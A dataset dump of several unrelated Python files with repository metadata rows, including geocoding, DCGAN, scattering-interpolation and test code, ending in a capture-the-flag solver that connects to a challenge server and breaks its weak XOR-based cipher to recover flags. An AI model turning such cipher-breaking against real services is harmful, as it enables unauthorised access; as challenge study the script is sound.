print('factorial is not defined for this number')
| UTF-8 | Python | false | false | 368 | py | 4 | factorial_num.py | 4 | 0.597826 | 0.586957 | 0 | 12 | 29.583333 | 59 |
rust84/warpcore | 14,766,097,587,921 | b08d3f72e92959f588e6f7163e9fcd7970576c32 | 26a22caedbd9276c7663ba375dc7e2037cefbff4 | /scripts/warpcore_cmd.py | 7e0778bddccc4c7cef3195e254eeb54870876024 | []
| no_license | https://github.com/rust84/warpcore | 38d3bc008d2d684aec3094728f168c7322118525 | 4300efd6903fdd18d820db99e11c8c137cfd26a7 | refs/heads/main | 2023-06-16T21:53:36.031025 | 2021-07-11T23:06:55 | 2021-07-11T23:06:55 | 384,987,820 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import serial
import os
def serialcmdw():
os.system('clear')
serialcmd = input("Enter command:")
ser.write(serialcmd.encode())
ser = serial.Serial()
os.system('clear')
ser.port = "COM5"
ser.baudrate = 9600
ser.open()
print("Example usage: <2, 160, 220, 255, 1>")
print("Parameters: <Warp Factor, Hue, Saturation, Brightness, Pattern>")
while True:
serialcmdw()
| UTF-8 | Python | false | false | 379 | py | 5 | warpcore_cmd.py | 4 | 0.680739 | 0.638522 | 0 | 19 | 18.947368 | 72 |
MayrockAndy/SchafkopfAnalyser | 13,924,284,018,898 | 9e728ad30025d998d4fd57336aeafff86077eec8 | ca1c496a71b622608fed740d1e8ffbd77434e430 | /schafkopf_analyser/__init__.py | afdd8e06b0240a37ee3b5df99d7b2604417663b9 | [
"MIT"
]
| permissive | https://github.com/MayrockAndy/SchafkopfAnalyser | b17e9f7a14930d4de1a9560ce181e160ce7a0c39 | d8d5e27f6668444083acbe1c6dc10e3dbc951ee4 | refs/heads/main | 2023-07-13T11:19:39.307955 | 2021-08-12T22:10:47 | 2021-08-12T22:10:47 | 395,332,371 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from .flask_factory import create_app
| UTF-8 | Python | false | false | 38 | py | 9 | __init__.py | 7 | 0.815789 | 0.815789 | 0 | 1 | 37 | 37 |
Fhernd/PythonEjercicios | 4,518,305,612,701 | 34f89744b88248f837c1a2efc85aff06e3815055 | b50df8a902f4e2c1ecd8667b7b97937da3371caf | /Parte002/ex1067_hackerrank_estudiantes_lectura_periodico.py | b076038f7bd0e1db97f0fb8f1bcaf207d01be89e | []
| no_license | https://github.com/Fhernd/PythonEjercicios | 5a5633855979baec89a3c257eb57aac076a7465f | 204d3d59ddeed6cbf263b23f14e950c20f81f608 | refs/heads/master | 2021-11-23T00:26:28.861302 | 2021-10-14T16:50:27 | 2021-10-14T16:50:27 | 230,629,743 | 124 | 84 | null | false | 2021-09-15T18:45:25 | 2019-12-28T15:45:28 | 2021-09-15T18:43:56 | 2021-08-21T14:22:48 | 39,577 | 39 | 32 | 1 | Python | false | false | # Ejercicio 1067: HackerRank Encontrar aquellos estudiantes que leen al menos un diario.
# Task
# The students of District College have subscriptions to English and French newspapers. Some students have subscribed only to English, some have subscribed to only French and some have subscribed to both newspapers.
# You are given two sets of student roll numbers. One set has subscribed to the English newspaper, and the other set is subscribed to the French newspaper. The same student could be in both sets. Your task is to find the total number of students who have subscribed to at least one newspaper.
# ...
if __name__ == '__main__':
m = int(input())
rolls_m = set(list(map(int, input().split())))
n = int(input())
rolls_n = set(list(map(int, input().split())))
result = rolls_m.union(rolls_n)
print(len(result))
| UTF-8 | Python | false | false | 855 | py | 124 | ex1067_hackerrank_estudiantes_lectura_periodico.py | 122 | 0.715789 | 0.711111 | 0 | 18 | 46.5 | 292 |
JimHaughwout/gadm_scan | 10,582,799,435,406 | 8dc802fb880fb9f7a4e1e75e9881027552b5b995 | 394bb1367e9d00844b6bf9f8b79563af7b6a5daa | /tools/geocode.py | 6c9ec635cdfe625d6df62a935dd943b0bd484e89 | [
"MIT"
]
| permissive | https://github.com/JimHaughwout/gadm_scan | df55b695f7a88d3be641b9576ece097db27ad308 | 1572305b6f4dda28b5fb7ad2367a63d610a8b8f3 | refs/heads/master | 2021-01-10T15:54:40.121398 | 2015-11-30T15:13:29 | 2015-11-30T15:13:29 | 46,618,319 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/env python
"""
Converting lat, long into real addresses (and back) using pygeocoder.
Slower but more robust in terms of tolerance of partial addresses
and level of formated information provided. This still makes use of
Google's geocoding API V3.
Dependency: pip install pygeocoder
: param -a : geocode address
: param -r : reverse geocode from lat-lng to address
: param -j : print full GeocoderResult object in json
To make a command line script:
- Move this file to /usr/local/bin
- Remove .py extention
- chmod +x filename
- Ensure "/usr/local/bin" is in your PATH
"""
from pygeocoder import Geocoder
import sys
from sys import argv
import json
def geocode_address(address="77 Massachusetts Avenue, Cambridge, MA"):
"""
Geocode an address query
:param string address: the address you which to encode
Result is class GeocoderResult with following useful properties:
lat, lng = result.coordinates
latitude = result.latitude
longitude = result.longitude
street_number = result.street_number
street = result.route
city = result.city
state = result.state
province = result.province
postal_code = result.postal_code
country = result.country
formatted_address = result.formatted_address
valid_address is TRUE or FALSE
"""
try:
result = Geocoder.geocode(address)
except: #Catch all exceptions
e = sys.exc_info()[1]
sys.exit("Geocoder %s for %s" % (e, address))
# Check if result is a valid address
if result.valid_address:
return result
else:
sys.exit("Error - encode_address: Address=%r is an invalid address." %
address)
return None
def geodecode_coords(lat, lng):
"""
Convert lat, long info full address of class GeocoderResult
:param float lat is latitude in degrees
:param float lng is longitude in degrees
"""
try:
# Convert to float in case you get whole value degrees
result = Geocoder.reverse_geocode(float(lat), float(lng))
except: #Catch all exceptions
e = sys.exc_info()[1]
sys.exit("Reverse Geocode %s for %r and %r." % (e, lat, lng))
return result
# Check if help options passed
help_message = '''
Usage: %s -options [args]' % argv[0]
\t-r to reverse geocode arg[2]=latitude arg[3]=longitude'
\t-a to geocode arg[2]="address to geocode"'
\t-j to produce full json output vs simple output.
'''
if (len(argv) == 1) or ('-h' in argv[1]):
print help_message
sys.exit()
# Determing encoding and output format
encoding = 'unknown'
output = 'simple'
if '-' in argv[1]:
if 'r' in argv[1]:
encoding = 'reverse'
if 'a' in argv[1]:
encoding = 'normal'
if 'j' in argv[1]:
output = 'full json'
# Get and verify input
if encoding == 'reverse':
if len(argv) != 4:
print 'Format is %s %s latitude longitude' % (argv[0], argv[1])
print 'You provided %d arguments' % len(argv)
sys.exit()
try:
lat = float(argv[2])
lng = float(argv[3])
except:
e = sys.exc_info()[0]
sys.exit('Error: Did not pass numbers for both latitude and longitude.')
if abs(lat) > 90:
sys.exit('Error: Latitude of %f is out of range [-90, 90].' % lat)
if abs(lng) > 180:
sys.exit('Error: Longitude of %f is out of range [-180, 180].' % lng)
result = geodecode_coords(lat, lng)
elif encoding == 'normal':
if len(argv) != 3:
print 'Format is %s %s "address to encode"' % (argv[0], argv[1])
print 'You provided %d arguments' % len(argv)
sys.exit()
address = argv[2]
result = geocode_address(address)
else:
print 'Could not process input, try: %s -help' % argv[0]
sys.exit()
if output == 'full json':
print json.dumps(result.raw, sort_keys=True, indent=2, separators=(',', ': '))
else:
print '\nAddress: %s' % result.formatted_address
print 'Lat, Long: %f %f' % (result.coordinates)
print 'Street Number %s' % result.street_number
print 'Street/Route: %s' % result.route
print 'Postal Code: %s' % result.postal_code
print 'Neighborhood: %s' % result.neighborhood
print 'City/Locatlity: %s' % result.city
print 'County (GADM Level 2): %s' % result.county
print 'State/Province (GADM Level 1): %s' % result.state
print 'Country: %s\n' % result.country | UTF-8 | Python | false | false | 4,108 | py | 13 | geocode.py | 6 | 0.685492 | 0.674781 | 0 | 147 | 26.952381 | 79 |
schreiber-lab/fastxq | 11,407,433,172,224 | 148b12241d47c0cc8baf9704113e83c7be8bdd74 | e7b37cc2fe813ccedc3c6899ebea97a8d55e9388 | /fastxq.py | 24523d6ecd91f57d7bcbcd7e25eddf258bdaf485 | [
"MIT"
]
| permissive | https://github.com/schreiber-lab/fastxq | a02c4523b44019463cbd8dfd0952a6c2d1764e5d | c5048b2b8714a1416ef7f33f8df22307cbebbf8a | refs/heads/master | 2023-04-12T18:30:09.640274 | 2022-08-22T18:05:45 | 2022-08-22T18:05:45 | 527,681,414 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import cv2 as cv
__author__ = 'Vladimir Starostin'
__email__ = 'vladimir.starostin@uni-tuebingen.de'
__version__ = '0.0.1'
__all__ = [
'QInterpolation',
'PolarInterpolation',
'convert_img',
'get_detector_q_grid',
'get_detector_polar_grid',
]
class QInterpolation(object):
def __init__(self,
q_xy_max: float,
q_z_max: float,
q_xy_size: int,
q_z_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
algorithm: int = cv.INTER_LINEAR,
flip_y: bool = False,
flip_z: bool = False,
):
self._init_config(
y0=y0,
z0=z0,
wavelength=wavelength,
distance=distance,
pixel_size=pixel_size,
incidence_angle=incidence_angle,
q_xy_max=q_xy_max,
q_z_max=q_z_max,
q_xy_size=q_xy_size,
q_z_size=q_z_size,
)
self._flip_y, self._flip_z = flip_y, flip_z
self._algorithm = algorithm
self._xy, self._zz = self._get_grid()
if self._algorithm not in (cv.INTER_LINEAR, cv.INTER_CUBIC, cv.INTER_LANCZOS4):
self._algorithm = cv.INTER_LINEAR
def _init_config(self, **kwargs):
self._config = dict(kwargs)
def _get_grid(self):
return get_detector_q_grid(**self._config)
def __call__(self, img: np.ndarray):
img = self.flip(img)
return convert_img(img, self._xy, self._zz, self._algorithm)
def flip(self, img: np.ndarray):
if self._flip_y:
img = np.flip(img, 1)
if self._flip_z:
img = np.flip(img, 0)
return img
def __repr__(self):
kwargs = ', '.join(f'{k}={str(v)}' for k, v in self._config.items())
return f'{self.__class__.__name__}({kwargs})'
class PolarInterpolation(QInterpolation):
def __init__(self,
q_xy_max: float,
q_z_max: float,
polar_q_size: int,
polar_angular_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
algorithm: int = cv.INTER_LINEAR,
flip_y: bool = False,
flip_z: bool = False,
):
super().__init__(
q_xy_max, q_z_max, polar_q_size, polar_angular_size, y0, z0, incidence_angle, wavelength, distance,
pixel_size, algorithm, flip_y, flip_z,
)
def _init_config(self, **kwargs):
kwargs['polar_q_size'] = kwargs.pop('q_xy_size')
kwargs['polar_angular_size'] = kwargs.pop('q_z_size')
self._config = dict(kwargs)
def _get_grid(self):
return get_detector_polar_grid(**self._config)
def convert_img(img: np.ndarray, xy: np.ndarray, zz: np.ndarray, algorithm: int = cv.INTER_LINEAR):
return cv.remap(img.astype(np.float32), xy.astype(np.float32), zz.astype(np.float32), algorithm)
def get_detector_q_grid(
q_xy_max: float,
q_z_max: float,
q_xy_size: int,
q_z_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
):
q_xy, q_z = _get_q_grid(q_xy_max=q_xy_max, q_z_max=q_z_max, q_xy_size=q_xy_size, q_z_size=q_z_size)
xy, zz = _get_detector_grid(
q_xy=q_xy,
q_z=q_z,
y0=y0,
z0=z0,
incidence_angle=incidence_angle,
wavelength=wavelength,
distance=distance,
pixel_size=pixel_size,
)
return xy, zz
def get_detector_polar_grid(
q_xy_max: float,
q_z_max: float,
polar_q_size: int,
polar_angular_size: int,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
):
q_xy, q_z = _get_q_polar_grid(q_xy_max, q_z_max, polar_q_size, polar_angular_size)
xy, zz = _get_detector_grid(
q_xy=q_xy,
q_z=q_z,
y0=y0,
z0=z0,
incidence_angle=incidence_angle,
wavelength=wavelength,
distance=distance,
pixel_size=pixel_size,
)
return xy, zz
def _get_detector_grid(
q_xy: np.ndarray,
q_z: np.ndarray,
y0: float,
z0: float,
incidence_angle: float,
wavelength: float,
distance: float,
pixel_size: float,
):
k = 2 * np.pi / wavelength
d = distance / pixel_size
q_xy, q_z = q_xy / k, q_z / k
q2 = q_xy ** 2 + q_z ** 2
norm = d / (1 - q2 / 2)
alpha = np.pi / 180 * incidence_angle
sin, cos = np.sin(alpha), np.cos(alpha)
zz = (norm * (q_z - sin) + d * sin) / cos
yy2 = norm ** 2 - zz ** 2 - d ** 2
yy2[yy2 < 0] = np.nan
yy = np.sqrt(yy2)
zz += z0
yy += y0
return yy, zz
def _get_q_grid(q_xy_max: float, q_z_max: float, q_xy_size: int, q_z_size: int):
q_xy = np.linspace(0, q_xy_max, q_xy_size)
q_z = np.linspace(0, q_z_max, q_z_size)
q_xy, q_z = np.meshgrid(q_xy, q_z)
return q_xy, q_z
def _get_q_polar_grid(q_xy_max: float, q_z_max: float, polar_q_size: int, polar_angular_size: int):
q_max = np.sqrt(q_xy_max ** 2 + q_z_max ** 2)
r = np.linspace(0, q_max, polar_q_size)
phi = np.linspace(0, np.pi / 2, polar_angular_size)
rr, pp = np.meshgrid(r, phi)
q_z = rr * np.sin(pp)
q_xy = rr * np.cos(pp)
return q_xy, q_z
| UTF-8 | Python | false | false | 5,823 | py | 6 | fastxq.py | 4 | 0.509359 | 0.498369 | 0 | 221 | 25.348416 | 111 |
probml/pyprobml | 9,363,028,745,697 | e73713446c7ea76e924275033761eabb45d8f89f | b2bcf07493b5a1bbfb7e29c7f13ac0b380cefead | /deprecated/scripts/boston_housing.py | 86328b192b7e0e26e60245dc1684acbc4c8f0750 | [
"MIT"
]
| permissive | https://github.com/probml/pyprobml | e1952927bceec676eb414f9342470ba4b8e6703b | 9cc22f3238ae092c2b9bff65d6283c93d38d25d4 | refs/heads/master | 2023-08-31T07:36:11.603301 | 2023-08-13T02:47:12 | 2023-08-13T02:47:12 | 65,924,871 | 6,263 | 1,598 | MIT | false | 2023-01-20T23:34:23 | 2016-08-17T16:42:24 | 2023-01-19T23:55:44 | 2023-01-20T23:34:22 | 5,242,676 | 5,374 | 1,280 | 34 | Jupyter Notebook | false | false | # Boston housing demo
import superimport
import numpy as np
import matplotlib.pyplot as plt
import os
figdir = "../figures"
def save_fig(fname): plt.savefig(os.path.join(figdir, fname))
import pandas as pd
import sklearn.datasets
import sklearn.linear_model as lm
from sklearn.model_selection import train_test_split
# Prevent numpy from printing too many digits
np.set_printoptions(precision=3)
# Load data (creates numpy arrays)
boston = sklearn.datasets.load_boston()
X = boston.data
y = boston.target
# Convert to Pandas format
df = pd.DataFrame(X)
df.columns = boston.feature_names
df['MEDV'] = y.tolist()
df.describe()
# plot marginal histograms of each column (13 features, 1 response)
df.hist()
plt.show()
# scatter plot of response vs each feature
nrows = 3; ncols = 4;
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, sharey=True, figsize=[15, 10])
plt.tight_layout()
plt.clf()
for i in range(0,12):
plt.subplot(nrows, ncols, i+1)
plt.scatter(X[:,i], y)
plt.xlabel(boston.feature_names[i])
plt.ylabel("house price")
plt.grid()
save_fig("boston-housing-scatter.pdf")
plt.show()
# Rescale input data
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.33, random_state=42)
scaler = sklearn.preprocessing.StandardScaler()
scaler = scaler.fit(X_train)
Xscaled = scaler.transform(X_train)
# equivalent to Xscaled = scaler.fit_transform(X_train)
# Fit model
linreg = lm.LinearRegression()
linreg.fit(Xscaled, y_train)
# Extract parameters
coef = np.append(linreg.coef_, linreg.intercept_)
names = np.append(boston.feature_names, 'intercept')
print([name + ':' + str(round(w,1)) for name, w in zip(names, coef)])
"""
['CRIM:-1.0', 'ZN:0.9', 'INDUS:0.4', 'CHAS:0.9', 'NOX:-1.9', 'RM:2.8', 'AGE:-0.4',
'DIS:-3.0', 'RAD:2.0', 'TAX:-1.4', 'PTRATIO:-2.1', 'B:1.0', 'LSTAT:-3.9', 'intercept:23.0']
"""
# Assess fit on test set
Xscaled = scaler.transform(X_test)
ypred = linreg.predict(Xscaled)
plt.figure()
plt.scatter(y_test, ypred)
plt.xlabel("true price")
plt.ylabel("predicted price")
mse = sklearn.metrics.mean_squared_error(y_test, ypred)
plt.title("Boston housing, rmse {:.2f}".format(np.sqrt(mse)))
xs = np.linspace(min(y), max(y), 100)
plt.plot(xs, xs, '-')
save_fig("boston-housing-predict.pdf")
plt.show()
| UTF-8 | Python | false | false | 2,283 | py | 1,255 | boston_housing.py | 518 | 0.696452 | 0.673237 | 0 | 91 | 24.076923 | 91 |
Farzan64n/gan-elements | 2,972,117,409,013 | cee21b6d50ab146dcb6ed673288c5228900ef185 | 7d2e8afb603b3d49ca246350e6f670bd3eb5a311 | /wgangp/models.py | ad0bafc75e74540b90bc5db6080ea82a45412e8a | [
"MIT"
]
| permissive | https://github.com/Farzan64n/gan-elements | b3b3de60ccbcd4c6b1c8b653b1e66aa3b80781da | 01499be9a6ed75319c1bc7ee5681041579dc3ee0 | refs/heads/master | 2022-04-04T06:47:07.996921 | 2020-01-24T21:37:09 | 2020-01-24T21:37:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from tensorflow.keras.layers import BatchNormalization, Conv2D, Dense
from tensorflow.keras.layers import Input, Flatten, LeakyReLU, Reshape
from tensorflow.keras.layers import UpSampling2D
from tensorflow.keras.models import Model
def dcgan_disc(img_shape=(32,32,1)):
# Adapted from:
# https://github.com/eriklindernoren/Keras-GAN/blob/master/dcgan/dcgan.py
def conv_block(channels, strides=2):
def block(x):
x = Conv2D(channels, kernel_size=3, strides=strides,
padding="same")(x)
x = LeakyReLU(0.2)(x)
return x
return block
image_in = Input(shape=img_shape, name="sample_in")
x = conv_block(64, strides=1)(image_in)
x = conv_block(128)(x)
x = conv_block(256)(x)
x = Flatten()(x)
disc_out = Dense(1, activation="linear")(x)
model = Model(inputs=image_in, outputs=disc_out)
return model
def dcgan_gen(img_shape=(32,32,1), noise_dim=64):
# Adapted from:
# https://github.com/eriklindernoren/Keras-GAN/blob/master/dcgan/dcgan.py
def up_block(channels):
def block(x):
x = UpSampling2D()(x)
x = Conv2D(channels, kernel_size=3, padding="same")(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(0.2)(x)
return x
return block
noise_in = Input(shape=(noise_dim,), name="noise_in")
initial_shape = (img_shape[0]//4, img_shape[1]//4, 256)
x = Dense(np.prod(initial_shape))(noise_in)
x = LeakyReLU(0.2)(x)
x = Reshape(initial_shape)(x)
x = up_block(128)(x)
x = up_block(64)(x)
img_out = Conv2D(img_shape[-1], kernel_size=3, padding="same",
activation="tanh")(x)
return Model(inputs=noise_in, outputs=img_out)
| UTF-8 | Python | false | false | 1,782 | py | 12 | models.py | 11 | 0.62009 | 0.590348 | 0 | 57 | 30.263158 | 77 |
graphcore/popart | 893,353,230,394 | c7165a9d5edd133f71462bda6cda520eb1200f43 | 7d93616b09afdd38ba25f70bf56e84d92d16f8e1 | /tests/unittests/python/popart._internal.ir/bindings/test_graphid.py | c156802562eaf9dd16f5bf775c5d327c71d7986d | [
"MIT",
"BSL-1.0",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | https://github.com/graphcore/popart | ac3c71617c5f0ac5dadab179b655f6b2372b453d | efa24e27f09b707865326fe4a30f4a65b7a031fe | refs/heads/sdk-release-3.0 | 2023-07-08T08:36:28.342159 | 2022-09-23T12:22:35 | 2022-09-23T15:10:23 | 276,412,857 | 73 | 13 | NOASSERTION | false | 2022-09-29T12:13:40 | 2020-07-01T15:21:50 | 2022-09-20T10:27:49 | 2022-09-29T12:13:39 | 22,515 | 64 | 6 | 3 | C++ | false | false | # Copyright (c) 2021 Graphcore Ltd. All rights reserved.
import itertools
import popart._internal.ir as _ir
def test_graphid_construction():
"""Test that we can construct a popart._internal.ir.GraphId object."""
_ = _ir.GraphId("g")
def test_graphid_operator_lt():
"""Test the < operator."""
for xstr, ystr in itertools.product(["g1", "g2", "y7", "z123"], repeat=2):
x = _ir.GraphId(xstr)
y = _ir.GraphId(ystr)
x_le_y = x < y
y_le_x = y < x
# We can't violate assymetry
assert not (x_le_y and y_le_x)
if xstr == ystr:
# Expect irreflexivity: neither x < y or y < x
assert (not x_le_y) and (not y_le_x)
else:
# Expect totality: one of x < y or y < x
assert x_le_y or y_le_x
def test_graphid_operator_eq_and_neq():
"""Test the == and != operators."""
for xstr, ystr in itertools.product(["g1", "g2", "y7", "z123"], repeat=2):
x = _ir.GraphId(xstr)
y = _ir.GraphId(ystr)
if xstr == ystr:
assert x == y
assert not (x != y)
else:
assert not (x == y)
assert x != y
def test_graphid_str():
"""Test GraphId.str() returns the ID as a string."""
id1 = _ir.GraphId("g1")
assert id1.str() == "g1"
id2 = _ir.GraphId("foobar")
assert id2.str() == "foobar"
| UTF-8 | Python | false | false | 1,392 | py | 2,412 | test_graphid.py | 2,241 | 0.531609 | 0.514368 | 0 | 52 | 25.769231 | 78 |
dream-developer/project-selenium | 17,076,789,991,551 | b18ff04ec8f74ab9ad7384661a0296d4eede7655 | d4700f720c27d6a49fb624f1d0efb013828abe19 | /python/selenium_screenshot.py | 2ffadaf752d27b4efdbe203dcb8a19234c77a364 | []
| no_license | https://github.com/dream-developer/project-selenium | d7cf4fa392bc41933589d11f72e9e1ccca5f1532 | 066895c54b168a1616d568ae8f1da09c597ee195 | refs/heads/master | 2023-04-29T19:11:26.038941 | 2020-07-01T11:34:42 | 2020-07-01T11:34:42 | 265,194,479 | 4 | 8 | null | false | 2023-04-24T07:56:18 | 2020-05-19T08:48:29 | 2023-04-23T16:19:02 | 2023-04-24T07:56:08 | 12 | 4 | 9 | 0 | Python | false | false | # -*- coding: utf-8 -*-
from selenium import webdriver
import time
url = "file:///C:/Users/writer/study_work/html/javascript.html"
driver = webdriver.Chrome()
driver.get(url)
driver.save_screenshot("screenshot.png")
time.sleep(3)
driver.quit()
| UTF-8 | Python | false | false | 253 | py | 37 | selenium_screenshot.py | 26 | 0.70751 | 0.699605 | 0 | 9 | 26.111111 | 63 |
Twiske/AdventOfCode2015 | 9,208,409,884,023 | db08237e0265a74eacb0e480135601abc5959377 | ad610ea4f56cee872781c126a874bde412026913 | /8/8.py | 00b622e0cbfbef0602fdcd70c03a031efbee25de | []
| no_license | https://github.com/Twiske/AdventOfCode2015 | 3d609e33c99e0739027c624731d1c0b0bc00a261 | 1096f2edc06544981b64222200bba164251dd472 | refs/heads/master | 2021-01-10T15:21:20.762839 | 2015-12-26T22:35:58 | 2015-12-26T22:35:58 | 48,625,304 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import sys
import re
stringRegex = re.compile('"(.*?)"')
for line in sys.stdin:
internalString = stringRegex.search(line).groups()[0]
processedString = bytes(internalString, "utf-8").decode("unicode_escape")
print(len(processedString))
print(len(line))
#print(len(raw(line))) | UTF-8 | Python | false | false | 321 | py | 9 | 8.py | 7 | 0.682243 | 0.672897 | 0 | 12 | 24.916667 | 75 |
xeroc/vanteem | 1,348,619,753,822 | 757a905a30565fb452660017cc5abf456d775c5a | 294a83961324b1cc42dfa5267a31330c95b956ae | /setup.py | 28c253c5468b4313005cd55195b2fc79cc1aac74 | []
| no_license | https://github.com/xeroc/vanteem | 518d361724b6a25d1169b17c22d8e8f412e2956e | fbea8f32a1b7a10673242dbffb9d0d6717102550 | refs/heads/master | 2017-05-02T20:48:39.255096 | 2016-04-28T11:09:24 | 2016-04-28T11:09:24 | 57,294,289 | 6 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
from setuptools import setup
VERSION = '0.0.1'
setup(name='vanteem',
version=VERSION,
description='Python based blog software with posts stored on the STEEM blockchain',
long_description=open('README.md').read(),
download_url='https://github.com/xeroc/vanteem/tarball/' + VERSION,
author='Fabian Schuh',
author_email='<Fabian@BitShares.eu>',
maintainer='Fabian Schuh',
maintainer_email='<Fabian@BitShares.eu>',
url='http://www.github.com/xeroc/vanteem',
keywords=['steem', 'blog', 'blockchain'],
packages=["vanteem"],
classifiers=['License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
],
entry_points={
'console_scripts': [
'vanteem = vanteem.__main__:main',
],
},
install_requires=["steem",
"python-frontmatter",
"jinja2",
"flask",
"Flask-Scss",
"markdown",
"pymdown-extensions",
"flask-runner",
],
include_package_data=True,
)
| UTF-8 | Python | false | false | 1,412 | py | 15 | setup.py | 3 | 0.5 | 0.495751 | 0 | 40 | 34.3 | 89 |
RocketDonkey/wargames | 1,683,627,226,790 | 5ac28d7c8245929b2b701951a189f4f15d37b995 | 38edafb83f2265e00aaaaec5697617b4ac6f5f14 | /christmas_challenge/christmas_challenge.py | c67833da61b84106487aa62ec6191707b6b4b6d6 | []
| no_license | https://github.com/RocketDonkey/wargames | dba8a0f86e9c358c7a0f0b8df17392315d139b11 | 757b0f94fc3bba11cee8ef5b42469a7eefb56eb4 | refs/heads/master | 2021-01-18T22:36:53.937291 | 2016-05-15T10:05:16 | 2016-05-15T10:05:16 | 30,543,160 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """c01db33f Christmas Challenge.
This challenge involves logging into the server at 0wn.b33f.me and recovering
the keys from the service.
* Flag 1: Encrypted response can be reversed to find the flag.
* Flag 2: Execute a FORTRAN program.
* Flag 3: (not solved)
"""
import socket
import struct
import sys
# This is the response required for determining the crypto.
ENCRYPTED_RESPONSE = """\
To enhance the security of our members, we have implemented a what-the-factor \
authentication system. If you haven't yet received your passphrase or are \
having issues using your issued prng token, please contact member support.
I need your passphrase, sir?
"""
# Utility functions.
def ListToHex(list_):
list_ = int(''.join(list_).encode('hex'), 16)
return int(struct.pack('<L', list_).encode('hex'), 16)
def ROL(byte, count):
"""Implementation of the x86 rol instruction."""
return ((byte << count) | (byte >> (32 - count))) & 0xffffffff
def LittleEndian(input_string):
"""Convert a byte string into its little Endian equivalent."""
return int(
struct.pack('<L', int(input_string.encode('hex'), 16)).encode('hex'), 16)
class ChristmasChallenge(object):
"""Interact with http://0wn.b33f.me/ and get the treasures."""
def __init__(self):
"""Instantiate the connection."""
self.encrypt_array = []
self.edx_counter = 0
self.ecx_counter = 1
# Some things behave differently locally.
self.local = True
if self.local:
self._sock = socket.create_connection(('0.0.0.0', 9989))
self.flag_1 = 'CHRISTMAS{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}\n'
self.flag_2 = 'CHRISTMAS{BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB}\n'
else:
self._sock = socket.create_connection(('162.243.220.222', 9989))
self.flag_1 = 'CHRISTMAS{mY_crYpt0_sucks_aNd_1_shoU1d_b3_4shaMed}\n'
self.flag_2 = 'CHRISTMAS{h4cKing_l1ek_it5_1956_all_0v3r_aGa1n}\n'
def InitArrays(self):
"""This is used only for testing and is not required on the live version."""
# Starting 4-byte /dev/urandom key.
self.starting_key = int(raw_input('Enter value: '), 16)
# The constant 0x2e1832af at memory address 0x804e220 is XOR'd with the key.
# 0x804b937 xor DWORD PTR [ebx+0x124],esi
self.xor_const = 0x2e1832af ^ self.starting_key
# The key is then AND'd with a constant 0xFF0. This becomes the value that is
# checked during the LOOP below. This is at most 4080 (0xFF0).
self.loop_iterations = self.starting_key & 0xFF0
# Following the CHRISTMAS{A*39} string, there are additional junk bytes that are
# used when calculating the hash. Note that the final four-byte sequence is
# actually determined based on the key value.
self._array_bytes = [
0x49524843, 0x414d5453, 0x41417b53, 0x41414141,
0x41414141, 0x41414141, 0x41414141, 0x41414141,
0x41414141, 0x41414141, 0x41414141, 0x41414141,
0x14007d41, 0x80802c19, 0x13e06a53, 0xf5af7004,
0x40b79d02, 0x3f34167b, 0x94283bed, 0xab3cd88b,
0x399ae388, 0xa825c405, 0x47e8f8a0, 0x4436ed8d,
0x0dbef722, 0x752f11bc, 0x7bf809d7, 0xf7d61652,
0x829c1ce8, 0x1926a149, 0xeb1c5b56, self.xor_const,
]
self.ecx_counter = 1
self.edx_counter = 0
# Generate the CHRISTMAS_ARRAY based on the above bytes.
self._christmas_array = []
for byte_ in self._array_bytes:
packed = struct.pack('<L', byte_)
self._christmas_array.extend(packed)
self.encrypt_array = []
# Generate the starting buffer based on the random key.
self.GenInitialChristmasArray()
def GenInitialChristmasArray(self):
"""Generate the initial state of the christmas_array."""
while self.loop_iterations:
# Hash the starting array.
self.ModifyChristmasArray(self._christmas_array)
self.loop_iterations -= 1
def GenNewChristmasArray(self):
new_arr = []
for i in range(32):
new_arr.extend(self.ModifyChristmasArray(self._christmas_array))
return new_arr
def EncryptString(self, target):
"""Encrypt a string using the current encryption scheme.
When a message is encrypted, the same general process is followed, but the
difference is that instead of each counter starting at 0 and 1, they start
at different positions, pulling data out of the array, adding, rotating and
reinserting.
"""
to_encrypt_array = list(target)
len_encrypt = len(target)
# Generate a new CHRISTMAS_ARRAY buffer. This is a 128-byte buffer that is
# generated and then used when encrypting strings. When it is exhausted, a new
# one is created.
position = 0
encrypted = []
while position < len_encrypt:
to_encrypt = to_encrypt_array[position:position+32]
for char in to_encrypt:
# If the array has been exhausted, refill it.
if not self.encrypt_array:
self.encrypt_array = self.GenNewChristmasArray()
xor_byte = self.encrypt_array.pop(0)
encrypted.append(struct.pack('<B', ord(char) ^ ord(xor_byte)))
position += 32
return struct.pack('<%dc' % len_encrypt, *encrypted)
def DecryptString(self, target):
decryped = []
for char in target:
# If the array has been exhausted, refill it.
if not self.encrypt_array:
self.encrypt_array = self.GenNewChristmasArray()
xor_byte = self.encrypt_array.pop(0)
decryped.append(ord(char) ^ ord(xor_byte))
return ''.join(chr(char) for char in decryped)
def FindEncryptionKey(self, bytes_, target):
"""Given a byte stream and its known equivalent, find the encryption key.
Take the byte stream we get back and see if we can derive the state of the
christmas_array at the time that we started encoding the first 128 bytes.
